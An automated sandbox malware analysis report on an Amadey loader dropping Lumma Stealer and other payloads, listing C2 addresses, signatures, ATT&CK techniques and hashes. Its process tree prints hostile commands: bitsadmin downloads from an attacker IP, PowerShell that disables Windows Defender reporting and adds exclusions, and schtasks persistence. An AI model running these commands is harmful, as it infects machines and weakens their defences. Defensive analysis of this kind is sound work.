Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
-
submitted
28/11/2024, 15:57
General
-
Target
d99688821d8644f9e44764be9944c327abc3162866e51ad78a02dcdc25a08730.exe
-
Size
1.8MB
-
MD5
6d76634e0d5a3748dbb40ed91d91480a
-
SHA1
70fa798c82153db02e218b3a7efa2f56f051cced
-
SHA256
d99688821d8644f9e44764be9944c327abc3162866e51ad78a02dcdc25a08730
-
SHA512
137b80797c2158247adb3a7a865b5d0a44cf096b0a6c9377f2e548b5475d811273f0a367aa11db74538474df64fe58384f04ce013d9d5395904e68a8edf9af9a
-
SSDEEP
49152:rD4pAVIEUn78EYltySaV85C1E/K4fvnMPgn/E:r8+VOn4EY6gfK4cP/
Malware Config
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
lumma
https://preside-comforter.sbs
https://savvy-steereo.sbs
https://copper-replace.sbs
https://record-envyp.sbs
https://slam-whipp.sbs
https://wrench-creter.sbs
https://looky-marked.sbs
https://plastic-mitten.sbs
https://tail-cease.cyou
https://hallowed-noisy.sbs
Extracted
lumma
https://tail-cease.cyou/api
Signatures
-
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
-
Amadey family
-
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
-
Lumma family
-
Enumerates VirtualBox registry keys 2 TTPs 2 IoCs
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell and hide display window.
-
Download via BitsAdmin 1 TTPs 2 IoCs
-
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 14 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Drops startup file 1 IoCs
-
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 13 IoCs
-
Identifies Wine through registry keys 2 TTPs 7 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
-
Loads dropped DLL 40 IoCs
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Drops file in System32 directory 1 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Program Files directory 4 IoCs
-
Drops file in Windows directory 17 IoCs
-
Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 23 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
Modifies data under HKEY_USERS 43 IoCs
-
Modifies registry class 24 IoCs
-
Modifies system certificate store 2 TTPs 5 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 25 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 4 IoCs
-
Suspicious use of SetWindowsHookEx 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\d99688821d8644f9e44764be9944c327abc3162866e51ad78a02dcdc25a08730.exe"C:\Users\Admin\AppData\Local\Temp\d99688821d8644f9e44764be9944c327abc3162866e51ad78a02dcdc25a08730.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\1009882001\TaskbarMonitorInstaller.exe"C:\Users\Admin\AppData\Local\Temp\1009882001\TaskbarMonitorInstaller.exe"3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe" /nologo /codebase "C:\Program Files\TaskbarMonitor\TaskbarMonitor.dll"4⤵
- Loads dropped DLL
- Modifies registry class
-
-
-
C:\Users\Admin\AppData\Local\Temp\1009905001\nbea1t8.exe"C:\Users\Admin\AppData\Local\Temp\1009905001\nbea1t8.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\AppData\Local\Temp\1009917001\tvtC9D3.exe"C:\Users\Admin\AppData\Local\Temp\1009917001\tvtC9D3.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\ping.exeping -n 1 8.8.8.84⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /transfer "DownloadUnRAR" /priority high "http://194.15.46.189/UnRAR.exe" "C:\Users\Admin\AppData\Local\Temp\UnRAR.exe"4⤵
- Download via BitsAdmin
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /transfer "DownloadletgrtsC1" /priority high "http://194.15.46.189/letgrtsC1.rar" "C:\Users\Admin\AppData\Local\Temp\letgrtsC1.rar"4⤵
- Download via BitsAdmin
- System Location Discovery: System Language Discovery
-
-
-
C:\Users\Admin\AppData\Local\Temp\1009923001\uxN4wDZ.exe"C:\Users\Admin\AppData\Local\Temp\1009923001\uxN4wDZ.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\1009923001\uxN4wDZ.exe"C:\Users\Admin\AppData\Local\Temp\1009923001\uxN4wDZ.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies system certificate store
-
-
-
C:\Users\Admin\AppData\Local\Temp\1009928001\TcMBq5M.exe"C:\Users\Admin\AppData\Local\Temp\1009928001\TcMBq5M.exe"3⤵
- Executes dropped EXE
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i C:\Users\Admin\AppData\Local\Temp\{C1F30AD5-204F-4BEE-BC9B-DD775CD60E06}\CD60E06\Click2Profit.msi AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\1009928001\TcMBq5M.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\1009928001\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1732550042 " AI_EUIMSI=""4⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
-
-
-
C:\Users\Admin\AppData\Local\Temp\1009929001\0cd5551689.exe"C:\Users\Admin\AppData\Local\Temp\1009929001\0cd5551689.exe"3⤵
- Enumerates VirtualBox registry keys
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\AppData\Local\Temp\1009930001\cd712b5ed8.exe"C:\Users\Admin\AppData\Local\Temp\1009930001\cd712b5ed8.exe"3⤵
- Enumerates VirtualBox registry keys
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\AppData\Local\Temp\1009935001\41691819c1.exe"C:\Users\Admin\AppData\Local\Temp\1009935001\41691819c1.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\AppData\Local\Temp\1009936001\f5e49340e3.exe"C:\Users\Admin\AppData\Local\Temp\1009936001\f5e49340e3.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Drops startup file
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding E9DD81DB03AD152E0F51B6330E8686BA C2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 91D071CEA271A08F56F1C70351248E462⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssA02A.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msiA026.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scrA027.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scrA028.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\AppData\Local\Corporation\SystemCare1.0.exe"C:\Users\Admin\AppData\Local\Corporation\SystemCare1.0.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\Installer\MSIA378.tmp"C:\Windows\Installer\MSIA378.tmp" /DontWait /RunAsAdmin /HideWindow "C:\Users\Admin\AppData\Roaming\Installer\Setup\task.bat"2⤵
- Executes dropped EXE
- Access Token Manipulation: Create Process with Token
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C ""C:\Users\Admin\AppData\Roaming\Installer\Setup\task.bat" "3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /create /tn "SystemCare" /tr "C:\Users\Admin\AppData\Local\Corporation\SystemCare1.0.exe" /sc onstart /delay 0005:004⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Start-Process powershell -ArgumentList '-WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command \"Add-MpPreference -ExclusionPath C:\Users\$env:username\AppData\Local; Set-MpPreference -MAPSReporting Disabled; Set-MpPreference -SubmitSamplesConsent NeverSend\"' -NoNewWindow"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath C:\Users\$env:username\AppData\Local; Set-MpPreference -MAPSReporting Disabled; Set-MpPreference -SubmitSamplesConsent NeverSend"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "00000000000005C4" "0000000000000550"1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
BITS Jobs
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Event Triggered Execution
1Component Object Model Hijacking
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Access Token Manipulation
1Create Process with Token
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Event Triggered Execution
1Component Object Model Hijacking
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Access Token Manipulation
1Create Process with Token
1BITS Jobs
1Modify Registry
2Subvert Trust Controls
1Install Root Certificate
1Virtualization/Sandbox Evasion
3Discovery
Peripheral Device Discovery
1Query Registry
6Remote System Discovery
1System Information Discovery
3System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Virtualization/Sandbox Evasion
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
15KB
MD5ff4fef65990a4d3168405658796314d5
SHA121c06a106bc9fd4077e837c624dabe2fbf5ff840
SHA2561d2c28c33a9f6556f5975fa671c9f7819967b5eed7b23f16f2746dade2d2bf2f
SHA51243df8f20e8076c766eef939d25d315f6d59a2bbf4ea98157060ed053b3234faa89cf5ca77767c260c6a3d4a7e8218d0cf2eba60b9713293905a520ae81b613bf
-
Filesize
1.0MB
MD55dd45593985c6b40d1d2dea0ce9a2fcf
SHA1700fb24d4f4e302ed94f755fa6f7caf9d6fb594e
SHA256237e715b292e3ebfdf7038d42290f9a6457f0375ee965e1236bd763bce413391
SHA512ca4e7df463b3d5643decfda936e4d7db1e3247c8f27a25ace150886a0c3ec2e79f1d82d2c4cbd5b89f42deaf4cd5709a7ca47d24a18ed1e1804b0c1e016966a3
-
Filesize
587KB
MD5aee263964001bcc56ca51ab75c437f05
SHA19a6b4fd812167bef70e2b3232294bfc942ecdb22
SHA2565f6ef36e4fd0765171c68c007e10ab796119c8e0ec37301fe360b77e4fdc8d90
SHA51266e27c6b12d7de386d93b9b7ef3191d19d889996c7367b13acb76aabb86997684e6cc49456149d4e60211d45006307af819f8db47fae29ad7d116009916b012f
-
Filesize
402B
MD5a2f89a8a64bd93c8f9efcb49e5b26f8f
SHA1d352d6fa4019f03e31727925b6760239766abf55
SHA256fdfdb3da23add517eacd8b5e4ea8baf781fcf3cac84fcb01b7a16a7a86afdc70
SHA512f87ce23211cf5d13d6f8eea38340266f266e12d673b4095bde5316653a79c64fc73e9e516805a4788e15ded25036f96d1dde78ea7a35a1dcefb299170a021f6b
-
Filesize
1KB
MD5df802bfaea7950e7c0196a6531a2f278
SHA1d8ff1bfcdebdd3ee16b36b5ce95cbfe3e37de626
SHA2567f211577f6fd9470b520754c3342f918711da8342b5d5e3513c63c7e88afc383
SHA5125ecf7a9ec08e67835b31ef0e47565008642141c1558f101bcfd1a6f3d5ae246fdbe54c37bf4d932cc8335c495a350c49802847072887c97e6d17da5b3464ee5a
-
Filesize
1B
MD5cfcd208495d565ef66e7dff9f98764da
SHA1b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA2565feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA51231bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99
-
Filesize
2.9MB
MD52ec142b97cf35b8089846aa53bb3bf63
SHA1cdfbc2b54c132e32be48b41660ede419c586ba9b
SHA25691aed4763f13b9fe40ac2ef9c5508a35aa689419f65a1d43ddb33b2c07e0e74b
SHA512b11642f4f0a83aabb67603aedff479d0d714e4e5341ff159d5ee312dc437b5da94f5eaccc8dff6b63750ec60457148576b215f958db1c6cf2a06be3095e19fa4
-
Filesize
1.6MB
MD518cf1b1667f8ca98abcd5e5dceb462e9
SHA162cf7112464e89b9fa725257fb19412db52edafd
SHA25656a8033f43692f54e008b7a631c027682e1cabd4450f9f45ce10d4fc10f3fcf3
SHA512b66be8acac0152ae3a9a658fde23f3f3ad026e3f8099df5c8771eb1524e8baa2ba9f88b9577a85493f0e241089798e40a158325cb606345c94d979e0088443d0
-
Filesize
42KB
MD556944be08ed3307c498123514956095b
SHA153ffb50051da62f2c2cee97fe048a1441e95a812
SHA256a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181
SHA512aa196a1a1e44c3fde974bbf8a031e6943a474d16d5a956b205d283ee5be53e110dba52817f7f2782e7ecc8783fea77f9c34613f99fb81fe09d2bea8b2f91bc13
-
Filesize
984KB
MD5a55d149ef6d095d1499d0668459c236f
SHA1f29aae537412267b0ad08a727ccf3a3010eea72b
SHA256c4a5fdd606768f6f69aa9e6cad874296c8e1e85f88b17f12b4ecab2c247c54ce
SHA5122c89c0b92afaf69e7c1a63e44ebbe41c7919ad74abd2b70a6077faa6a4ca24bc6103ddf584633cd177a858550c667b430668095c3dc9abb27fefa38940d4370b
-
Filesize
17.7MB
MD55f602a88eb5e8abb43c9035585f8dbef
SHA1b17a1bc278f0c7ccc8da2f8c885f449774710e4c
SHA25695b586a973d1b82e0ab59cd1127466d11fdf7fd352e10b52daa3e9a43d02d1f0
SHA5129575baf06700e8b10e03a20d80f570c6c9cf0ee09ad7589d58f096c7a73a5c17d31856b73120f9e38cd2ba2e13f1082b206ccbee3b070dd9b70b4e6460df5fff
-
Filesize
4.3MB
MD5cb7ba10f2c561061c41d604640ee290e
SHA1113d73476a90f98c51edf1b20ba000b642a2c5c5
SHA256d8bbd314c59d60f8ce6146f47a95759320afa2f9fcc11e3a28b0e9907e40b941
SHA5124bc1581ae9fe407ec7e35e2f0d4892c97ee7707448ce737b0e2e81fda64f30f74ba9705fac0a2dfca0dd9a47431ec0843792a8d9473449b6fd051e9f23f5f006
-
Filesize
4.2MB
MD52d2a4ab5e984b2851daced50f535989c
SHA1965d337778c08020524e75fcce92236b940d8488
SHA2561b778ecef41fc3ab523d561a1fbe2bde46ac75b32a7e0abf7b466f030714d54f
SHA5121f74d0a75f237e33fae8e91a1feaf52bdbbe57ecd506fc80dc641f545adcb954b39d897e8aad4a2c7f80620b58a64625bda7dd736894afc1bd57ecac2c856b16
-
Filesize
2.0MB
MD54a3bf35b9c2d6577e142da237ff5e25b
SHA15fd2b806318daf1e5522845d562a1e978dc46f49
SHA2565c593a57c0028a269f29d291a478ef4a11344b77bc4267d3d90cc2e4ad8dbff7
SHA512a7a84eb933d4a4664765898217a169fc2edc30bf068ffbd52304ee9a588517a17d965eceea084571f8790fd25828b5d4857a8631b706fa879d8b479a2179256e
-
Filesize
1.8MB
MD551ea9eba3a6b53b198dfa7a147c47cd9
SHA19b22b5e80434eaf5bdf287146f08033c9542a861
SHA256cb8f34a0b29aa6c12f13a9dc9c3e4739c15716d002da7f74e6331c23358ec9d0
SHA512308ba41ad69a0477a0cd44324efe69542119369252e485b19d1d2a28724bf801f3b58a723411c814a3deff72214e456c8649b8804f81512d159604ee13e9ce70
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
2.8MB
MD5bf973011e42f25d8eaa92a8c6f441c4c
SHA122358a1877ab28ef1d266cc5a5c06d44b3344959
SHA25628ea007c4e157e619c2c495881ee0cc419f4c16ea45cefc71d2f9bef207a1c9e
SHA512fbd82523520adc1c90a9540239c90147e4cd828d1badefa283ec096c63cb4f53f1142d8cd5e0b35e570431cad20195749412513a627aab4b3d90e3b5b238d5bd
-
Filesize
3.3MB
MD5e6945cceefc0a122833576a5fc5f88f4
SHA12a2f4ed006ba691f28fda1e6b8c66a94b53efe9d
SHA256fb8d0049f5dd5858c3b1da4836fb4b77d97b72d67ad951edb48f1a3e087ec2b1
SHA51232d32675f9c5778c01044251abed80f46726a8b5015a3d7b22bbe503954551a59848dacfe730f00e1cd2c183e7ccccb2049cde3bc32c6538ff9eb2763392b8c9
-
Filesize
45KB
MD5dba35d31c2b6797c8a4d38ae27d68e6e
SHA137948e71dc758964e0aa19aee063b50ef87a7290
SHA256086d6ba24f34a269856c4e0159a860657590d05aabb2530247e685543b34c52f
SHA512282e7613fe445785fa5ed345415bc008637b7d1d7988cc6da715b024311a1c29425f5edb26a1d90f301af408b60244dd81e1459eef2aab10b07d1ac352770b4b
-
Filesize
46KB
MD5a8bca50f7966f578b127d1e24fc2430f
SHA1cfa1e5d684d938fdb9a97ff874cd2166a10ca0c8
SHA256c209d080a62f5e67ddc01a3ae6b4f9b103faf4104c93b7dbb5ffa8d548bf0cd5
SHA51286b1e4eec873b5951408f1793b5a35725fb53e2282e194b409705f476d8bea9750dcee74bd51ae5d3acb3d47846a8b7210b1493f7d9ac012140df5e6a57d8c69
-
Filesize
134B
MD5cb411fc505156909365d8b72b8a6354d
SHA1aca49a1068a4a632a0183fd19a1d20feb03ce938
SHA2566bac6fc17e74ea55ccad30f3719fafa420687e4aa6e5072dafa1168d0783fc2c
SHA512bad73eab72ad0c116bd5faf486c324ab15b71afb72c6dce9d66a56e2ed44b6f7fb42a8569980343e7dbbc674affbb8bd29b01e27f3e68675678e757ef96e8646
-
Filesize
44B
MD5f904d94be2e4e5dd262e84fae2884865
SHA1a099012a12b00d81f9263de0bf3163171f25963f
SHA256efc3a099238b9e63556b7b0342029830843072fff4a721ce95abcdaaa94f302c
SHA51277a17da95baa24eb832ead0d7f33a12515575473f8b6c5b1d78739256ed0449657f58d2f14cdcff81774af6beae8524f5a46d5d4e87ffd8de76851ce360f5e7c
-
Filesize
37KB
MD590bb882a4b5e3427f328259530aa1b3b
SHA1a4059f0c105f4e2abe84efc4a48fa676171f37c5
SHA256b2b420aa1805d8b5dc15ccb74dd664d10bd6ba422743f5043a557a701c8a1778
SHA512a486280bba42d6c2d8b5ca0a0191b6b29067e1c120f85dbff709a4a42c61d925804915f93f815f56c9ca06ea9f8b89de0e692776524d28d81e29ef1c75501db8
-
Filesize
45KB
MD53fdb8d8407cccfaa0290036cc0107906
SHA1fc708ecac271a35a0781fed826c11500184c1ea4
SHA2563a71a119eeabce867b57636070adeb057443a6ec262be1360f344cb3905545db
SHA51279fdf0f6316069a4810a67c64a662803dede86d32223b6c07da4e970d45e0a75f6027183a63d361787514fb095ce980a640c7e840c11aba93abc8318cc92ee94
-
Filesize
32KB
MD5c108d79d7c85786f33f85041445f519f
SHA12c30d1afc274315c6d50ee19a47fff74a8937ea1
SHA256d5459a707922dd2bf50114cc6718965173ee5b0f67deb05e933556150cfdd9d1
SHA5126bb5316cd8cd193a8bc2b9fbe258a4b9233508f4aaaa079d930a8c574dc9c9786863ae0a181061fcb2a84b7a43e5b98c5a264cad8aae5e0890a2a58c114a0d9c
-
Filesize
38KB
MD552c6978203ca20beead6e8872e80d39f
SHA1f223b7ba12657cd68da60ab14f7ab4a2803fc6e7
SHA256e665f3519309bae42e0e62f459ecc511701ddddf94599ebfd213d0a71775c462
SHA51288b64203d6f3daed11da153bc2f02196296203dc913836c98595c09f7772c40830284366db964fcb6886b78b0ebb8f78517cdc7b6d0ad7922861597eaf474b85
-
Filesize
32KB
MD5eddf7fb99f2fcaea6fe4fd34b8fd5d39
SHA185bbc7a2e1aaafd043e6c69972125202be21c043
SHA2569d942215a80a25e10ee1a2bb3d7c76003642d3a2d704c38c822e6a2ca82227bf
SHA5120b835d4521421d305cf34d16b521f0c49b37812ef54a20b4ab69998b032cca59581b35c01e885ec4a77eac0b4e1d23228d9c76186a04a346a83f74a7198c343b
-
Filesize
245KB
MD53232706a63e7cdf217b8ed674179706c
SHA112ac2af70893147ca220d8e4689e33e87f41688d
SHA25645c1f50c922ac1d9d4108e37f49981fd94f997667e23085cb2ea226d406c5602
SHA512db787e96a2ad4d67338f254996cf14c441de54fc112065fba230da97593de6b1fb4ef0459dcd7f4aea8fb3648fa959c05978ca40813036bf8a26860befa38407
-
Filesize
26KB
MD52831b334b8edf842ce273b3dd0ace1f8
SHA1e586bf0172c67e3e42876b9cd6e7f349c09c3435
SHA2566bae9af6a7790fbdee87b7efa53d31d8aff0ab49bdaaefd3fb87a8cc7d4e8a90
SHA51268dca40e3de5053511fc1772b7a4834538b612724ec2de7fb2e182ba18b9281b5f1ccf47bd58d691024f5bcddfc086e58570ad590dd447f6b0185a91a1ac2422
-
Filesize
25KB
MD5d0604a5f13b32a08d5fa5bd887f869a6
SHA1976338eb697507ac857a6434ef1086f34bc9db24
SHA2562b6444d2a8146a066109ca19618ceee98444127a5b422c14635ab837887e55bf
SHA512c42edbaf6506dc1ca3aae3f052a07c7d2c4841f5b83003186cda185193f7cd2035cfe07e04a28356d254ab54666b5d60be4763e3e204273ecd0d7f2cd84bfc90
-
Filesize
314KB
MD5756d047a93d72771578286e621585ed2
SHA1313add1e91a21648f766aaa643350bec18ec5b5d
SHA256f9ebf4c98c1e0179cd76a1985386928fdb9e6f459e2238ed5530d160df4f0923
SHA51267fa91f266f0030ca0695f1c7964ee4d1c1447413420d0379eca62d54cc9d6cd0706df62da0043259b563e95a9c3a5c7ef0e0baacb36cafed5c9fcb1a3954aca
-
Filesize
25KB
MD5131a58669be7b3850c46d8e841da5d4e
SHA11c08ae3c9d1850da88edc671928aa8d7e2a78098
SHA256043f3acf1dc4f4780721df106046c597262d7344c4b4894e0be55858b9fad00e
SHA5124f62b0c5ba0be6fb85fa15e500c348c2a32266e9b487357ea8ed1c1be05d7eabc46c9a1eeb9c5339291f4dd636b7291447a84d4ad5efbc403e5e7966b3863ade
-
Filesize
325KB
MD5f859ecc883476fe2c649cefbbd7e6f94
SHA19900468c306061409e9aa1953d7d6a0d05505de8
SHA256b057c49c23c6ebe92e377b573723d9b349a6ede50cfd3b86573b565bf4a2ae0b
SHA51267af11fb9c81a7e91be747b2d74e81e8fe653ef82f049b652c7892c4ec4cafeba76b54a976616cbf1cd6b83f0abe060e82e46bf37f3ed841d595c4318d6fd73b
-
Filesize
18KB
MD5379358b4cd4b60137c0807f327531987
SHA1b0a5f6e3dcd0dbc94726f16ed55d2461d1737b59
SHA2560ff1d03926f5d9c01d02fae5c5e1f018a87d7f90a1826de47277530bfc7776f8
SHA512097c08135d654596a19ada814ad360a8c2374d989cbd7094c6acb092e9854abf1f1d878d3da72b66c4c75806586bee7fe04d555a1d82db170725bdbeadea7d50
-
Filesize
1.1MB
MD567130d64a3c2b4b792c4f5f955b37287
SHA16f6cae2a74f7e7b0f18b93367821f7b802b3e6cf
SHA2567581f48b16bd9c959491730e19687656f045afbab59222c0baba52b25d1055be
SHA512d88c26ec059ad324082c4f654786a3a45ecf9561a522c8ec80905548ad1693075f0ffc93079f0ef94614c95a3ac6bbf59c8516018c71b2e59ec1320ba2b99645
-
Filesize
7KB
MD505e615cca8f38f321fbd5a8b45b2be64
SHA139d874192d0006303768dad87070d38fd1c1172b
